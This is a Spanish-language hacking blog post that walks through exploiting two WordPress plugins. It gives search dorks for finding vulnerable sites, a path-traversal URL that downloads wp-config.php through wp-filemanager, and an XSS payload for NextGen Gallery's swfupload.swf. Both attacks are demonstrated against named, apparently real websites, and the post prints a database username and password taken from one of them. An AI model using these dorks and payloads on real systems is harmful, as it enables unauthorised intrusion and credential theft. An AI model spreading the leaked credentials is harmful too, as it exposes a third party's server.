HACKER ANGELWHITE GALC

viernes, 25 de julio de 2014

Explotando Vulnerabilidades de Wordpress




Saludos nuevamente mis queridos y fieles lectores de este humilde blog, en esta oportunidad  tocaremos el tema sobre la explotación de un "cms" como Wordpress, mediante los exploit's de url en los sectores vulnerables o débiles de privilegios

Exploit

Local File Download Wordpresss

La vulnerabilidad archivo de descarga de servidor local, nos permite descargas contenido de información de base de datos las cuales el atacante puede aprovechar para la penetración el servidor web de una manera fácil y rápida 

Dork

inurl:/wp-content/plugins/wp-filemanager/ site:.com

Exploit :

/incl/libfile.php?&path=../../&filename=wp-config.php&action=download


Ejemplo de ataque :

Link de la web la cual ingresaste el dork " http://www.wildrift.com/wp-content/plugins/wp-filemanager/" , luego de ello introducirás lo siguiente " /incl/libfile.php?&path=../../&filename=wp-config.php&action=download "

Como vemos en la imagen, podemos ver que al introducir el exploit , automáticamente nos descarga el archivo config.php, bien lo guardaremos



Archivo "config.php"



 INFORMACIÓN DE  BD

('DB_USER', 'wildri8u_advent');

/** MySQL database password */
define('DB_PASSWORD', 'xa.+(&]AUyrR');

/** MySQL hostname */
define('DB_HOST', 'localhost');


 Exploit

 Cross Site Scripting

Como todos sabemos lo que es un error " Cross Site Scripting  " , no es necesario que lo diga en este párrafo, pero dejare la referencia de ello en este link :
http://backtrack-omar.blogspot.com/2013/02/cross-site-scripting-xss.html


Bueno prosigamos, en el modulo de plugins "Plugin NextGen," , se ah descubierto que este complemento tiene un  grave error de "XSS", la cual puede ser aprovechado para varios tipos de ataques dirigidos de cualquier persona que tenga conocimientos de cada uno de ellos.


Dork :

inurl:/wp-content/plugins/wp-filemanager/ site:.com

Exploit :

/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('X4r0r-MostSecurity');//

Ejemplo :

drfranklipman.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');//

No hay comentarios:

Publicar un comentario